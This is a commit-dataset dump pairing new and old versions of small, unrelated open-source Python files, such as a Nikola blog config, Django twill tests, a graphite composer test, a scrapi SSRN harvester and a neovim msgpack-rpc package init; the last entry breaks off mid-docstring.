commit stringlengths 40 40 | subject stringlengths 4 1.73k | repos stringlengths 5 127k | old_file stringlengths 2 751 | new_file stringlengths 2 751 | new_contents stringlengths 1 8.98k | old_contents stringlengths 0 6.59k | license stringclasses 13 values | lang stringclasses 23 values |
|---|---|---|---|---|---|---|---|---|
7b118afcc96edf335d5c259adc3e2065648ace6f | update site URL | abrahamvarricatt/abrahamvarricatt.github.io,abrahamvarricatt/abrahamvarricatt.github.io,abrahamvarricatt/abrahamvarricatt.github.io | conf.py | conf.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import time
# Data about this site
BLOG_AUTHOR = "chronodekar"
BLOG_TITLE = "Note To Self"
SITE_URL = "http://note2self.abraham-v.com/"
BLOG_EMAIL = "no@email.here"
BLOG_DESCRIPTION = "Snippets of information"
# Multi-lingual settings (Not used - keeping them blank)
DEFAULT_LANG = "en"
TRANSLATIONS = {
DEFAULT_LANG: "",
}
# Sidebar/Navigation
NAVIGATION_LINKS = {
DEFAULT_LANG: (
("/archive.html", "Archives"),
("/categories/index.html", "Tags"),
("/rss.xml", "RSS feed"),
),
}
# Theme settings
THEME = "bootstrap3"
THEME_COLOR = '#5670d4'
# POST/PAGE tuples
POSTS = (
("posts/*.rst", "posts", "post.tmpl"),
("posts/*.html", "posts", "post.tmpl"),
)
PAGES = (
("stories/*.rst", "stories", "story.tmpl"),
("stories/*.html", "stories", "story.tmpl"),
)
TIMEZONE = "UTC+5:30"
# Mapping language with file extension
COMPILERS = {
"rest": ('.rst', '.txt'),
"html": ('.html', '.htm'),
}
WRITE_TAG_CLOUD = True
POSTS_SECTIONS = True
CATEGORY_ALLOW_HIERARCHIES = False
CATEGORY_OUTPUT_FLAT_HIERARCHY = False
FRONT_INDEX_HEADER = {
DEFAULT_LANG: '',
}
REDIRECTIONS = []
GITHUB_COMMIT_SOURCE = True
OUTPUT_FOLDER = 'output'
IMAGE_FOLDERS = {'images': 'images'}
GLOBAL_CONTEXT = {}
GLOBAL_CONTEXT_FILLER = []
COMMENT_SYSTEM = ""
COMMENT_SYSTEM_ID = ""
LICENSE = ""
CONTENT_FOOTER = 'Contents © {date} <a href="mailto:{email}">{author}</a> - Powered by<a href="https://getnikola.com" rel="nofollow">Nikola</a> {license}'
CONTENT_FOOTER_FORMATS = {
DEFAULT_LANG: (
(),
{
"email": BLOG_EMAIL,
"author": BLOG_AUTHOR,
"date": time.gmtime().tm_year,
"license": LICENSE,
}
)
}
| # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import time
# Data about this site
BLOG_AUTHOR = "chronodekar"
BLOG_TITLE = "Note To Self"
SITE_URL = "https://note2self-abrahamvarricatt.github.io/"
BLOG_EMAIL = "no@email.here"
BLOG_DESCRIPTION = "Snippets of information"
# Multi-lingual settings (Not used - keeping them blank)
DEFAULT_LANG = "en"
TRANSLATIONS = {
DEFAULT_LANG: "",
}
# Sidebar/Navigation
NAVIGATION_LINKS = {
DEFAULT_LANG: (
("/archive.html", "Archives"),
("/categories/index.html", "Tags"),
("/rss.xml", "RSS feed"),
),
}
# Theme settings
THEME = "bootstrap3"
THEME_COLOR = '#5670d4'
# POST/PAGE tuples
POSTS = (
("posts/*.rst", "posts", "post.tmpl"),
("posts/*.html", "posts", "post.tmpl"),
)
PAGES = (
("stories/*.rst", "stories", "story.tmpl"),
("stories/*.html", "stories", "story.tmpl"),
)
TIMEZONE = "UTC+5:30"
# Mapping language with file extension
COMPILERS = {
"rest": ('.rst', '.txt'),
"html": ('.html', '.htm'),
}
WRITE_TAG_CLOUD = True
POSTS_SECTIONS = True
CATEGORY_ALLOW_HIERARCHIES = False
CATEGORY_OUTPUT_FLAT_HIERARCHY = False
FRONT_INDEX_HEADER = {
DEFAULT_LANG: '',
}
REDIRECTIONS = []
GITHUB_COMMIT_SOURCE = True
OUTPUT_FOLDER = 'output'
IMAGE_FOLDERS = {'images': 'images'}
GLOBAL_CONTEXT = {}
GLOBAL_CONTEXT_FILLER = []
COMMENT_SYSTEM = ""
COMMENT_SYSTEM_ID = ""
LICENSE = ""
CONTENT_FOOTER = 'Contents © {date} <a href="mailto:{email}">{author}</a> - Powered by<a href="https://getnikola.com" rel="nofollow">Nikola</a> {license}'
CONTENT_FOOTER_FORMATS = {
DEFAULT_LANG: (
(),
{
"email": BLOG_EMAIL,
"author": BLOG_AUTHOR,
"date": time.gmtime().tm_year,
"license": LICENSE,
}
)
}
| mit | Python |
b2dd561322f6f277f470eae425028412a209da93 | Add Repository class and module | mcgid/morenines,mcgid/morenines | morenines/repository.py | morenines/repository.py | import os
from morenines import output
from morenines import util
from morenines.index import Index
from morenines.ignores import Ignores
NAMES = {
'repo_dir': '.morenines',
'index': 'index',
'ignore': 'ignore',
}
class Repository(object):
def __init__(self):
self.path = None
self.index = None
self.ignores = None
def open(self, path):
repo_dir_path = find_repo(path)
if not repo_dir_path:
output.error("Cannot find repository in '{}' or any parent dir".format(path))
util.abort()
self.path = repo_dir_path
self.index = Index.read(os.path.join(self.path, NAMES['index']))
self.ignores = Ignores.read(os.path.join(self.path, NAMES['ignore']))
def find_repo(start_path):
if start_path == '/':
return None
path = os.path.join(start_path, NAMES['repo_dir'])
if os.path.isdir(path):
return path
parent = os.path.split(start_path)[0]
return find_repo(parent)
| mit | Python | |
8273d67aaf74f4f05aa9c9fa86f710a937c708d4 | Test that submitting twice works | campbe13/openhatch,jledbetter/openhatch,eeshangarg/oh-mainline,nirmeshk/oh-mainline,vipul-sharma20/oh-mainline,sudheesh001/oh-mainline,mzdaniel/oh-mainline,heeraj123/oh-mainline,jledbetter/openhatch,openhatch/oh-mainline,ojengwa/oh-mainline,moijes12/oh-mainline,eeshangarg/oh-mainline,waseem18/oh-mainline,willingc/oh-mainline,vipul-sharma20/oh-mainline,openhatch/oh-mainline,campbe13/openhatch,ojengwa/oh-mainline,ojengwa/oh-mainline,eeshangarg/oh-mainline,moijes12/oh-mainline,SnappleCap/oh-mainline,eeshangarg/oh-mainline,waseem18/oh-mainline,sudheesh001/oh-mainline,SnappleCap/oh-mainline,jledbetter/openhatch,willingc/oh-mainline,jledbetter/openhatch,mzdaniel/oh-mainline,openhatch/oh-mainline,moijes12/oh-mainline,SnappleCap/oh-mainline,Changaco/oh-mainline,mzdaniel/oh-mainline,mzdaniel/oh-mainline,jledbetter/openhatch,eeshangarg/oh-mainline,mzdaniel/oh-mainline,heeraj123/oh-mainline,ojengwa/oh-mainline,Changaco/oh-mainline,sudheesh001/oh-mainline,heeraj123/oh-mainline,SnappleCap/oh-mainline,openhatch/oh-mainline,waseem18/oh-mainline,waseem18/oh-mainline,vipul-sharma20/oh-mainline,heeraj123/oh-mainline,ehashman/oh-mainline,ojengwa/oh-mainline,campbe13/openhatch,ehashman/oh-mainline,onceuponatimeforever/oh-mainline,willingc/oh-mainline,vipul-sharma20/oh-mainline,mzdaniel/oh-mainline,waseem18/oh-mainline,ehashman/oh-mainline,ehashman/oh-mainline,openhatch/oh-mainline,nirmeshk/oh-mainline,sudheesh001/oh-mainline,Changaco/oh-mainline,nirmeshk/oh-mainline,nirmeshk/oh-mainline,willingc/oh-mainline,heeraj123/oh-mainline,onceuponatimeforever/oh-mainline,nirmeshk/oh-mainline,campbe13/openhatch,vipul-sharma20/oh-mainline,onceuponatimeforever/oh-mainline,onceuponatimeforever/oh-mainline,moijes12/oh-mainline,SnappleCap/oh-mainline,Changaco/oh-mainline,Changaco/oh-mainline,campbe13/openhatch,ehashman/oh-mainline,willingc/oh-mainline,moijes12/oh-mainline,mzdaniel/oh-mainline,onceuponatimeforever/oh-mainline
,sudheesh001/oh-mainline | mysite/profile/tests.py | mysite/profile/tests.py | import django.test
from search.models import Project
import twill
from twill import commands as tc
from twill.shell import TwillCommandLoop
from django.test import TestCase
from django.core.servers.basehttp import AdminMediaHandler
from django.core.handlers.wsgi import WSGIHandler
from StringIO import StringIO
# FIXME: Later look into http://stackoverflow.com/questions/343622/how-do-i-submit-a-form-given-only-the-html-source
# Functions you'll need:
def twill_setup():
app = AdminMediaHandler(WSGIHandler())
twill.add_wsgi_intercept("127.0.0.1", 8080, lambda: app)
def twill_teardown():
twill.remove_wsgi_intercept('127.0.0.1', 8080)
def make_twill_url(url):
# modify this
return url.replace("http://openhatch.org/",
"http://127.0.0.1:8080/")
def twill_quiet():
# suppress normal output of twill.. You don't want to
# call this if you want an interactive session
twill.set_output(StringIO())
class ProfileTests(django.test.TestCase):
def setUp(self):
twill_setup()
def tearDown(self):
twill_teardown()
def testSlash(self):
response = self.client.get('/profile/')
def testAddContribution(self):
url = 'http://openhatch.org/profile/'
tc.go(make_twill_url(url))
tc.fv('add_contrib', 'project', 'Babel')
tc.fv('add_contrib', 'contrib_text', 'msgctxt support')
tc.fv('add_contrib', 'url', 'http://babel.edgewall.org/ticket/54')
tc.submit()
# Assert that we are not in some weird GET place with
# CGI args
tc.url(r'^[^?]*$')
tc.find('Babel')
tc.fv('add_contrib', 'project', 'Baber')
tc.fv('add_contrib', 'contrib_text', 'msgctxt support')
tc.fv('add_contrib', 'url', 'http://babel.edgewall.org/ticket/54')
tc.submit()
# Verify that leaving and coming back has it still
# there
tc.go(make_twill_url(url))
tc.find('Babel')
tc.find('Baber')
| import django.test
from search.models import Project
import twill
from twill import commands as tc
from twill.shell import TwillCommandLoop
from django.test import TestCase
from django.core.servers.basehttp import AdminMediaHandler
from django.core.handlers.wsgi import WSGIHandler
from StringIO import StringIO
# FIXME: Later look into http://stackoverflow.com/questions/343622/how-do-i-submit-a-form-given-only-the-html-source
# Functions you'll need:
def twill_setup():
app = AdminMediaHandler(WSGIHandler())
twill.add_wsgi_intercept("127.0.0.1", 8080, lambda: app)
def twill_teardown():
twill.remove_wsgi_intercept('127.0.0.1', 8080)
def make_twill_url(url):
# modify this
return url.replace("http://openhatch.org/",
"http://127.0.0.1:8080/")
def twill_quiet():
# suppress normal output of twill.. You don't want to
# call this if you want an interactive session
twill.set_output(StringIO())
class ProfileTests(django.test.TestCase):
def setUp(self):
twill_setup()
def tearDown(self):
twill_teardown()
def testSlash(self):
response = self.client.get('/profile/')
def testAddContribution(self):
url = 'http://openhatch.org/profile/'
tc.go(make_twill_url(url))
tc.fv('add_contrib', 'project', 'Babel')
tc.fv('add_contrib', 'contrib_text', 'msgctxt support')
tc.fv('add_contrib', 'url', 'http://babel.edgewall.org/ticket/54')
tc.submit()
# Assert that we are not in some weird GET place with
# CGI args
tc.url(r'^[^?]*$')
tc.find('Babel')
# Verify that leaving and coming back has it still
# there
tc.go(make_twill_url(url))
tc.find('Babel')
| agpl-3.0 | Python |
292b3c99fc294f9855bd7eb26b0089a04a5f93b5 | Create match_x_y_repetitions.py | costincaraivan/hackerrank,costincaraivan/hackerrank | regex/repetitions/python3/match_x_y_repetitions.py | regex/repetitions/python3/match_x_y_repetitions.py | Regex_Pattern = r'^\d{1,2}[a-zA-z]{3,}\.{0,3}$' # Do not delete 'r'.
| mit | Python | |
f3c8d092b67ad16bdd0937651ef34e3d84b15e2b | Add coverage for composer's send_email function (#2174) | obfuscurity/graphite-web,graphite-project/graphite-web,criteo-forks/graphite-web,mcoolive/graphite-web,deniszh/graphite-web,mcoolive/graphite-web,deniszh/graphite-web,cbowman0/graphite-web,graphite-project/graphite-web,mcoolive/graphite-web,cbowman0/graphite-web,obfuscurity/graphite-web,obfuscurity/graphite-web,deniszh/graphite-web,criteo-forks/graphite-web,mcoolive/graphite-web,drax68/graphite-web,obfuscurity/graphite-web,cbowman0/graphite-web,graphite-project/graphite-web,drax68/graphite-web,obfuscurity/graphite-web,obfuscurity/graphite-web,deniszh/graphite-web,drax68/graphite-web,criteo-forks/graphite-web,mcoolive/graphite-web,mcoolive/graphite-web,graphite-project/graphite-web,criteo-forks/graphite-web,criteo-forks/graphite-web,cbowman0/graphite-web,drax68/graphite-web,graphite-project/graphite-web,deniszh/graphite-web,drax68/graphite-web,deniszh/graphite-web,cbowman0/graphite-web,drax68/graphite-web,graphite-project/graphite-web,criteo-forks/graphite-web,cbowman0/graphite-web | webapp/tests/test_composer.py | webapp/tests/test_composer.py | import mock
from urllib3.response import HTTPResponse
from graphite.util import BytesIO
from .base import TestCase
try:
from django.urls import reverse
except ImportError: # Django < 1.10
from django.core.urlresolvers import reverse
class ComposerTest(TestCase):
@mock.patch('six.moves.http_client.HTTPConnection.request')
@mock.patch('six.moves.http_client.HTTPConnection.getresponse')
@mock.patch('graphite.composer.views.SMTP')
@mock.patch('django.conf.settings.SMTP_SERVER', 'localhost')
def test_send_email(self, mock_smtp, http_response, http_request):
url = reverse('composer_send_email')
request = { "to": "noreply@localhost",
"url": 'https://localhost:8000/render?target=sumSeries(a.b.c.d)&title=Test&width=500&from=-55minutes&until=now&height=400'}
response = self.client.get(reverse('render'), {'target': 'test'})
self.assertEqual(response['Content-Type'], 'image/png')
data = response.content
responseObject = HTTPResponse(body=BytesIO(data), status=200, preload_content=False)
http_request.return_value = responseObject
http_response.return_value = responseObject
instance = mock_smtp.return_value
instance.sendmail.return_value = {}
response = self.client.get(url, request)
self.assertEqual(response.content, b'OK')
| apache-2.0 | Python | |
d06d7ea2a1aabb81be9be77c958b766a2ab0e1b3 | Reduce implicit waiting for visible elements | beanqueen/salad,salad/salad,salad/salad,beanqueen/salad | salad/steps/browser/finders.py | salad/steps/browser/finders.py | from lettuce import world
from salad.logger import logger
from salad.steps.parsers import pick_to_index
from splinter.exceptions import ElementDoesNotExist
from selenium.webdriver.support.wait import WebDriverWait
from selenium.common.exceptions import TimeoutException
ELEMENT_FINDERS = {
'named "(.*)"': "find_by_name",
'with(?: the)? id "(.*)"': "find_by_id",
'with(?: the)? css selector "(.*)"': "find_by_css",
'with(?: the)? value (.*)': "find_by_value",
}
LINK_FINDERS = {
'to "(.*)"': "find_link_by_href",
'to a url that contains "(.*)"': "find_link_by_partial_href",
'with(?: the)? text "(.*)"': "find_link_by_text",
'with text that contains "(.*)"': "find_link_by_partial_text",
}
ELEMENT_THING_STRING = "(?:element|thing|field|textarea|radio button|button|checkbox|label)"
LINK_THING_STRING = "link"
VISIBILITY_TIMEOUT = 1
def _get_visible_element(finder_function, pick, pattern, wait_time=VISIBILITY_TIMEOUT):
element = _get_element(finder_function, pick, pattern)
w = WebDriverWait(world.browser.driver, wait_time)
try:
w.until(lambda driver: element.visible)
except TimeoutException as e:
raise ElementDoesNotExist
return element
def _get_element(finder_function, pick, pattern):
ele = world.browser.__getattribute__(finder_function)(pattern)
index = pick_to_index(pick)
ele = ele[index]
if not "WebDriverElement" in "%s" % type(ele):
if len(ele) > 1:
logger.warn("More than one element found when looking for %s for %s. Using the first one. " % (finder_function, pattern))
ele = ele.first
world.current_element = ele
return ele
def _convert_pattern_to_css(finder_function, first, last, find_pattern, tag=""):
pattern = ""
if finder_function == "find_by_name":
pattern += "%s[name='%s']" % (tag, find_pattern, )
elif finder_function == "find_by_id":
pattern += "#%s" % (find_pattern, )
elif finder_function == "find_by_css":
pattern += "%s" % (find_pattern, )
elif finder_function == "find_by_value":
pattern += "%s[value='%s']" % (tag, find_pattern, ) # makes no sense, but consistent.
else:
raise Exception("Unknown pattern.")
if first:
pattern += ":first"
if last:
pattern += ":last"
return pattern
| from lettuce import world
from salad.logger import logger
from salad.steps.parsers import pick_to_index
from splinter.exceptions import ElementDoesNotExist
from selenium.webdriver.support.wait import WebDriverWait
from selenium.common.exceptions import TimeoutException
ELEMENT_FINDERS = {
'named "(.*)"': "find_by_name",
'with(?: the)? id "(.*)"': "find_by_id",
'with(?: the)? css selector "(.*)"': "find_by_css",
'with(?: the)? value (.*)': "find_by_value",
}
LINK_FINDERS = {
'to "(.*)"': "find_link_by_href",
'to a url that contains "(.*)"': "find_link_by_partial_href",
'with(?: the)? text "(.*)"': "find_link_by_text",
'with text that contains "(.*)"': "find_link_by_partial_text",
}
ELEMENT_THING_STRING = "(?:element|thing|field|textarea|radio button|button|checkbox|label)"
LINK_THING_STRING = "link"
VISIBILITY_TIMEOUT = 5
def _get_visible_element(finder_function, pick, pattern, wait_time=VISIBILITY_TIMEOUT):
element = _get_element(finder_function, pick, pattern)
w = WebDriverWait(world.browser.driver, wait_time)
try:
w.until(lambda driver: element.visible)
except TimeoutException as e:
raise ElementDoesNotExist
return element
def _get_element(finder_function, pick, pattern):
ele = world.browser.__getattribute__(finder_function)(pattern)
index = pick_to_index(pick)
ele = ele[index]
if not "WebDriverElement" in "%s" % type(ele):
if len(ele) > 1:
logger.warn("More than one element found when looking for %s for %s. Using the first one. " % (finder_function, pattern))
ele = ele.first
world.current_element = ele
return ele
def _convert_pattern_to_css(finder_function, first, last, find_pattern, tag=""):
pattern = ""
if finder_function == "find_by_name":
pattern += "%s[name='%s']" % (tag, find_pattern, )
elif finder_function == "find_by_id":
pattern += "#%s" % (find_pattern, )
elif finder_function == "find_by_css":
pattern += "%s" % (find_pattern, )
elif finder_function == "find_by_value":
pattern += "%s[value='%s']" % (tag, find_pattern, ) # makes no sense, but consistent.
else:
raise Exception("Unknown pattern.")
if first:
pattern += ":first"
if last:
pattern += ":last"
return pattern
| bsd-3-clause | Python |
c39c8955782c3015f30a9ef7f8e8783ac105ae70 | add harvester for dailyssrn: | fabianvf/scrapi,ostwald/scrapi,felliott/scrapi,alexgarciac/scrapi,CenterForOpenScience/scrapi,mehanig/scrapi,jeffreyliu3230/scrapi,CenterForOpenScience/scrapi,erinspace/scrapi,felliott/scrapi,mehanig/scrapi,fabianvf/scrapi,erinspace/scrapi | scrapi/harvesters/dailyssrn.py | scrapi/harvesters/dailyssrn.py | from __future__ import unicode_literals
from dateutil.parser import parse
# from datetime import date, timedelta
import furl
from lxml import etree
from scrapi import requests
# from scrapi import settings
from scrapi.base import XMLHarvester
from scrapi.linter import RawDocument
from scrapi.util import copy_to_unicode
from scrapi.base.helpers import compose, single_result
class DailyssrnHarvester(XMLHarvester):
short_name = 'dailyssrn'
long_name = 'RSS Feed from the Social Science Research Network'
url = 'http://papers.ssrn.com/'
schema = {
"description": ('//description/node()', compose(lambda x: x.strip(), single_result)),
"title": ('//title/node()', compose(lambda x: x.strip(), single_result)),
"providerUpdatedDateTime": ('//pubDate/node()', compose(lambda x: x.isoformat(), parse, lambda x: x.strip(), single_result)),
"contributors": '//contributors/node()',
"uris": {
"canonicalUri": ('//link/node()', compose(lambda x: x.strip(), single_result)),
}
}
def harvest(self, start_date=None, end_date=None):
url = 'http://dailyssrn.com/rss/rss-all-2.0.xml'
data = requests.get(url)
doc = etree.XML(data.content)
records = doc.xpath('channel/item')
xml_list = []
for record in records:
# import ipdb; ipdb.set_trace()
doc_id = parse_id_from_url(record.xpath('link/node()'))
record = etree.tostring(record)
xml_list.append(RawDocument({
'doc': record,
'source': self.short_name,
'docID': copy_to_unicode(doc_id),
'filetype': 'xml'
}))
return xml_list
def parse_id_from_url(url):
# import ipdb; ipdb.set_trace()
parsed_url = furl.furl(url[0])
return parsed_url.args['abstract_id']
| apache-2.0 | Python | |
6780fbbb526b999b967376cf03fc816cfbfe1122 | add is_lat_unit_matters.py | clarka34/exploring-ship-logbooks,clarka34/exploringShipLogbooks | scripts/is_lat_unit_matters.py | scripts/is_lat_unit_matters.py | """
is_lat_unit_matters.py
By Wedward Wei
After I explore the data, I found some interesting detail. Like we have differnt types of "LongitudeUnits"
I am wondering if the latitude data could be presented in differnt ways, so we meed more steps before plot.
So I wrote this code to see if the worry is necessary.
"""
import os
import sys
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
"""
If data is not ready, we need download the raw data and unzip the files in the same route
If data is ready, return the DataFrame
"""
def if_data_ready(filename):
if os.path.exists(filename):
print (filename+" already exist")
return pd.read_csv(filename)
else:
print (filename+" does not exist, please check the file")
sys.exit()
file_path = os.getcwd()+"\\data\\CLIWOC15.csv"
raw_data = if_data_ready(file_path)
# Show that we have differnt types of "LongitudeUnits"
print(pd.value_counts(raw_data["LongitudeUnits"]))
raw_data_360_1 = raw_data[raw_data["LongitudeUnits"]=="360 degrees"]
raw_data_360_2 = raw_data[raw_data["LongitudeUnits"]=="360 GRADOS"]
raw_data_180_1 = raw_data[raw_data["LongitudeUnits"]=="180 degrees"]
raw_data_180_2 = raw_data[raw_data["LongitudeUnits"]=="180 GRADOS"]
position_1 = raw_data_360_1[pd.notnull(raw_data["Lat3"])][pd.notnull(raw_data["Lon3"])][["Lat3","Lon3"]]
position_2 = raw_data_360_2[pd.notnull(raw_data["Lat3"])][pd.notnull(raw_data["Lon3"])][["Lat3","Lon3"]]
position_3 = raw_data_180_1[pd.notnull(raw_data["Lat3"])][pd.notnull(raw_data["Lon3"])][["Lat3","Lon3"]]
position_4 = raw_data_180_2[pd.notnull(raw_data["Lat3"])][pd.notnull(raw_data["Lon3"])][["Lat3","Lon3"]]
#Output the 1st type of image
position_list = list(zip(position_1["Lat3"],position_1["Lon3"]))
plt.figure(figsize=(30, 15))
plt.xlim(-180,180)
plt.ylim(-70,60)
for i in position_list[:10000]: ##MAX=62324
plt.scatter(i[1], i[0],s=15, alpha=.2)
plt.savefig('360_1.png')
#Output the 2nd type of image
plt.clf() #clear the cache
position_list = list(zip(position_2["Lat3"],position_2["Lon3"]))
plt.figure(figsize=(30, 15))
plt.xlim(-180,180)
plt.ylim(-70,60)
for i in position_list[:10000]: ##MAX=16450
plt.scatter(i[1], i[0],s=8, alpha=.2)
plt.savefig('360_2.png')
#Output the 3rd type of image
plt.clf() #clear the cache
position_list = list(zip(position_3["Lat3"],position_3["Lon3"]))
plt.figure(figsize=(30, 15))
plt.xlim(-180,180)
plt.ylim(-70,60)
for i in position_list[:10000]: ##MAX=136133
plt.scatter(i[1], i[0],s=8, alpha=.2)
plt.savefig('180_1.png')
#Output the 4nd type of image
plt.clf() #clear the cache
position_list = list(zip(position_4["Lat3"],position_4["Lon3"]))
plt.figure(figsize=(30, 15))
plt.xlim(-180,180)
plt.ylim(-70,60)
for i in position_list: ##MAX=1781
plt.scatter(i[1], i[0],s=15, alpha=.2)
plt.savefig('180_2.png')
"""
After comparing the 4 images, we can reach the preliminary conclusion that,
the value in column "LongitudeUnits" does not affect the column "Lat3", so
we can use the data in Lat3" and "Lon3" directly.
""" | mit | Python | |
118627a170e3ba3cf8863b3bb0cdaf9b5e0441ff | Create monte_carlo_sliced_doughnut.py | rupertsmall/numerical-tools,rupertsmall/numerical-tools | monte_carlo_sliced_doughnut.py | monte_carlo_sliced_doughnut.py | #center of mass of a sliced doughnut
from random import random
from math import pi,sin,cos,atan
M=100000000 #number of samples
y_samples = 0 #samples which have been in correct y range
x_samples = 0 #samples which have been in correct x range
#do something random
def rand_r():
return random()
def rand_theta():
return pi*random() - pi/2
def rand_phi():
return 2*pi*random()
def x_is_in(r, theta, phi): #check that x value is in correct domain
x = (3+r*cos(phi))*cos(theta)
if x>=1:
return True
else:
return False
def y_is_in(r, theta, phi): #check that y value is in correct domain
y = (3+r*cos(phi))*sin(theta)
if y>=-3:
return True
else:
return False
#main function. N is the number of evaluations to make (at random points) withing the sliced doughnut
def monte_carlo(N):
i=0
actual_sample_size = 0
x=y=0
while i<=N:
r = rand_r()
theta = rand_theta()
phi = rand_phi()
if x_is_in(r, theta, phi) and y_is_in(r, theta, phi):
#print (3+r*cos(phi))*cos(theta), (3+r*cos(phi))*sin(theta), r*sin(phi) #temporary: to plot coordinates
x += (3+r*cos(phi))*cos(theta)
y += (3+r*cos(phi))*sin(theta)
actual_sample_size += 1
i +=1
print 'center of mass in x: ',x/float(actual_sample_size)
print 'center of mass in y: ',y/float(actual_sample_size)
print 'number of sample points: ',float(actual_sample_size)
monte_carlo(M)
| mit | Python | |
e74f78a663a8467e19d071d8e68ef11689c0b7ec | Add replay.py | haypo/perf,vstinner/pyperf | perf/tests/replay.py | perf/tests/replay.py | from __future__ import division, print_function, absolute_import
import os
import perf
import tempfile
def get_raw_values(filename, run_id):
bench = perf.Benchmark.load(filename)
run = bench.get_runs()[run_id]
inner_loops = run._get_inner_loops()
raw_values = [value * (loops * inner_loops)
for loops, value in run.warmups]
total_loops = run.get_total_loops()
raw_values.extend(value * total_loops for value in run.values)
return (run, raw_values)
class Replay(object):
def __init__(self, runner, filename):
self.runner = runner
self.args = runner.args
self.filename = filename
self.value_id = 0
self.init()
def init(self):
args = runner.args
if args.worker:
self.read_session()
run, self.raw_values = get_raw_values(self.filename, self.run_id)
args.loops = run._get_loops()
# FIXME: handle inner_loops
self.run_id += 1
self.write_session()
else:
args.session_filename = tempfile.mktemp()
self.run_id = self.args.first_run - 1
self.write_session()
def read_session(self):
filename = self.args.session_filename
with open(filename, "r") as fp:
line = fp.readline()
self.run_id = int(line.rstrip())
def write_session(self):
filename = self.args.session_filename
with open(filename, "w") as fp:
print(self.run_id, file=fp)
fp.flush()
def time_func(self, loops):
raw_value = self.raw_values[self.value_id]
self.value_id += 1
return raw_value
def add_cmdline_args(cmd, args):
cmd.append(args.filename)
if args.session_filename:
cmd.extend(('--session-filename', args.session_filename))
runner = perf.Runner(add_cmdline_args=add_cmdline_args)
runner.argparser.add_argument('filename')
runner.argparser.add_argument('--session-filename')
runner.argparser.add_argument('--first-run', type=int, default=1)
args = runner.parse_args()
replay = Replay(runner, args.filename)
runner.bench_time_func('bench', replay.time_func)
if not args.worker:
os.unlink(args.session_filename)
| mit | Python | |
e8561caeb3c95633e99f540965d33a67046df3e5 | Add __init__ module for the `msgpack_rpc` subpackage | Shougo/python-client,traverseda/python-client,traverseda/python-client,Shougo/python-client,0x90sled/python-client,fwalch/python-client,meitham/python-client,meitham/python-client,bfredl/python-client,brcolow/python-client,zchee/python-client,starcraftman/python-client,fwalch/python-client,neovim/python-client,timeyyy/python-client,0x90sled/python-client,starcraftman/python-client,neovim/python-client,brcolow/python-client,zchee/python-client,bfredl/python-client,timeyyy/python-client | neovim/msgpack_rpc/__init__.py | neovim/msgpack_rpc/__init__.py | """Msgpack-rpc subpackage.
This package implements a msgpack-rpc client. While it was designed for
handling some Nvim particularities(server->client requests for example), the
code here should work with other msgpack-rpc servers.
"""
from .async_session import AsyncSession
from .event_loop import EventLoop
from .msgpack_stream import MsgpackStream
from .session import Session
__all__ = ('tcp_session', 'socket_session', 'stdio_session', 'spawn_session')
def session(transport_type='stdio', *args, **kwargs):
loop = EventLoop(transport_type, *args, **kwargs)
msgpack_stream = MsgpackStream(loop)
async_session = AsyncSession(msgpack_stream)
session = Session(async_session)
return session
def tcp_session(address, port=7450):
"""Create a msgpack-rpc session from a tcp address/port."""
return session('tcp', address, port)
def socket_session(path):
"""Create a msgpack-rpc session from a unix domain socket."""
return session('socket', path)
def stdio_session():
"""Create a msgpack-rpc session from stdin/stdout."""
return session('stdio')
def spawn_session(argv):
"""Create a msgpack-rpc session from a new Nvim instance."""
return session('spawn', argv)
| apache-2.0 | Python | |
92cb3088d63ff6fc511c01d1d151f1f1857df496 | create smiles tokenizer unit test | lilleswing/deepchem,peastman/deepchem,deepchem/deepchem,lilleswing/deepchem,peastman/deepchem,deepchem/deepchem,lilleswing/deepchem | deepchem/feat/tests/test_smiles_tokenizer.py | deepchem/feat/tests/test_smiles_tokenizer.py | # Requriments - transformers, tokenizers
from unittest import TestCase
from deepchem.feat.smiles_tokenizer import SmilesTokenizer
from transformers import RobertaForMaskedLM
class TestSmilesTokenizer(TestCase):
"""Tests the SmilesTokenizer to load the USPTO vocab file and a ChemBERTa Masked LM model with pre-trained weights.."""
def test_featurize(self):
from rdkit import Chem
smiles = ["Cn1c(=O)c2c(ncn2C)n(C)c1=O", "CC(=O)N1CN(C(C)=O)C(O)C1O"]
mols = [Chem.MolFromSmiles(smile) for smile in smiles]
featurizer = dc.feat.one_hot.OneHotFeaturizer(dc.feat.one_hot.zinc_charset)
one_hots = featurizer.featurize(mols)
untransformed = featurizer.untransform(one_hots)
assert len(smiles) == len(untransformed)
for i in range(len(smiles)):
assert smiles[i] == untransformed[i][0]
| mit | Python | |
97d455da87d3175c1d5cf2ce3091f26184cf4a10 | Add heos discoverable (#250) | balloob/netdisco | netdisco/discoverables/heos.py | netdisco/discoverables/heos.py | """Discover Heos devices."""
from . import SSDPDiscoverable
class Discoverable(SSDPDiscoverable):
"""Add support for discovering DLNA services."""
def get_entries(self):
"""Get all the HEOS devices."""
return self.find_by_st("urn:schemas-denon-com:device:ACT-Denon:1")
| mit | Python | |
b90e3b0bce680154d7fea8ed071f740db963c402 | fix bug 1458641: fix reports-clean crontabber app | lonnen/socorro,lonnen/socorro,mozilla/socorro,lonnen/socorro,mozilla/socorro,lonnen/socorro,mozilla/socorro,mozilla/socorro,mozilla/socorro,mozilla/socorro | alembic/versions/e70541df7ed7_bug_1458641_fix_reports_clean.py | alembic/versions/e70541df7ed7_bug_1458641_fix_reports_clean.py | """bug 1458641 fix reports clean crontabber app
Revision ID: e70541df7ed7
Revises: 3474e98b321f
Create Date: 2018-05-02 18:20:19.064954
"""
from alembic import op
from socorro.lib.migrations import load_stored_proc
# revision identifiers, used by Alembic.
revision = 'e70541df7ed7'
down_revision = '3474e98b321f'
def upgrade():
# Note: This should have been done in migration 3474e98b321f.
load_stored_proc(op, ['001_update_reports_clean.sql'])
def downgrade():
pass
| mpl-2.0 | Python | |
7573a76a05e5c282cdad74b542d191dd8c90d8ab | Add OvfTransportTestCase.py | Awingu/open-ovf,Awingu/open-ovf,Awingu/open-ovf,Awingu/open-ovf | py/tests/OvfTransportTestCase.py | py/tests/OvfTransportTestCase.py | #!/usr/bin/python
# vi: ts=4 expandtab syntax=python
##############################################################################
# Copyright (c) 2008 IBM Corporation
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Eclipse Public License v1.0
# which accompanies this distribution, and is available at
# http://www.eclipse.org/legal/epl-v10.html
#
# Contributors:
# Dave Leskovec (IBM) - initial implementation
##############################################################################
"""
